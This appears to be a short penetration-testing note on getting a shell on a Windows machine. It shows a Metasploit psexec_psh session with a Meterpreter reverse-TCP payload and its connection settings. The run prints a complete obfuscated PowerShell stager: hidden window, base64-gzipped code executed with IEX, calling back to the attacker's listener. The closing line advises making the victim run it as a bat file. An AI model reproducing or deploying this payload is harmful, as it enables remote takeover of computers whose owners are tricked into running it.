Open shell via XSS (internet Explorer)
Even better, open reverse connection.
> show options
> show options
Module options (exploit/windows/smb/psexec_psh):
Name Current Setting Required Description
---- --------------- -------- -----------
DryRun true no Prints the powershell command that would be used
RHOST 192.168.21.1 yes The target address
RPORT 445 yes Set the SMB service port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.71 yes The listen address
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
> exploit
[*] Started reverse handler on 192.168.1.71:4445
[+] "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAB8HPlYCA7VWa4/aOBT9PJX6H6IKiUSlJDB0XlKldYDwGGCAQBigqPIkTvDgxEzi8Or2v+8NhHlsZ3a7u9oIFD/utY/PPdc3bhzYgvJACidjPyhK39+/O+niEPuSnInEwG4a56c5KWNX1ka/ehFaZ8rJCZhkvGK130GrJkZC+iLJU7RcVriPaTC7uirHYUgCcejna0SgKCL+HaMkkhXpd2k0JyH5dHN3T2whfZcy3/I1xu8wS822ZWzPifQJBU4y1+I2ThDmzSWjQs5+/ZpVpp8Ks3z1IcYskrPmNhLEzzuMZRXph5JsONguiZxtUzvkEXdFfkSD02J+GETYJR1YbUXaRMy5E2UVOAz8QiLiMJCeHytZ52AlZ6HZDbmNHCckETjlG8GKL4icCWLGctJv8jQF0Y8DQX0C84KEfGmScEVtEuXrOHAY6RN3JnfI+nj2X3WSnzuBVVeESg4C9DbaNndiRg4LZJWf8T7GVoHnZXyBkR/v371/5x6V4XxbPJcFtE6m+zYBuHKXR3Rv9kXSclIbdsSCh1voZgZhTJSZNE2iMZ3NpAzZrvWgtXQuqv1l7u11CkenxKXZ1DowNrU4dWbgkwYss9oYVNNZ+axwt59/W4AV4tKAVLYB9ql91Jj8WhyIy8j+zPmjWQfQydl0gjgVwoiHRUJpTpr+7Fb1qXj01WPKHBIiG2IZASoIs/ISzCFKcrYRtIkPpB36WYiHC8omR+tUzdvj7kkfjLJlhqMoJ3VjSC07J5kEM+LkJBRENJ1CseD7ZvYJbjtmgto4EsflZsqf+Uz3LfMgEmFsQzyBg4G5JDbFLKEkJ9WpQ/StSb3j/tlXCSljxmjgwUorCAiMJESYIlFJCFBfKELJm0Q0/CUjPtjuc95g2IMMTxNkLy/sESf7FuJjBhzknnB0JOcZXgi8ybjISRYNBVwhCd97mf03PM9ukRfIyiFJYyYfU2uqb0WSERk/2BSLcSLflLo9UaEAkoyQ+zqOyFnJFCFQKH9Qb2gZwTNuBKxt6wtaQGtaaLThP6SnDV45d66b93U1rGzmLmpEjXa9W+nV66VV07RKwqw2xHW3IdrV2/t7E9X7w7GYNFB9QLXFuLRbNunObCFnvFHPdvpuremb3b3nuOOK63rnrtkvfDZoa1Tu6VoRtyrVuDXS17pWiqp0Xe/RYW/RNMTd2GJ46KrebeES000rvLcKvL1rIFSbn9q7pmvV5m1nO66rl6PSAlURKgdVy9D59VgPUVe1sGfx9bWn94teGemGQ8mkNzT0Xs/Q0bB2/1C5VD3wvcVzfWQV6WR5259D3wAI16pWajhkx8c9IKnGEfb6YOOVi/bcBZvKR6R/7PCoiBc6RzrYGJMHwDVeGl0G84NhkSOLdW4xak22hqoWxt0Sqmt0VPNQsiT29B5G0aqyq6gFy+HO6HNn7KrWLTtXK+XB0nZVVV3XK9f2pLC5uDkv6dpD2ac+uys66uXwQg/gZN2V5/RG5/1NZ3sH+w1V1fqQqAfkk4njZrF+WhysmKU/08Rb5aGNw2iOGWgFLvxjMhs8NNKLu8tp4iHLaWlfkDAgDOogVMqj9hFj3E5qSXLJQxk7FJcZ5PIQmqfFV1uK9GioPNWW49DV1QRgQi4dxJ1vkcAT85y2OdU0qBDapqTBgX/9cGW+3MrpYrmkxrzg6Wkftt9HSfIr49eD2rpZE/j/pjFN7jm8nL+h8WnsL2Z/iVot95KCn6ZfDvwjtv8FByNMBdiacEkxcqior1KRiufZ18hjmEAdbvokH4g3sfjUgS+VPwAotmIxnQoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
the bat file you make the victim execute is the payload above without double quotes.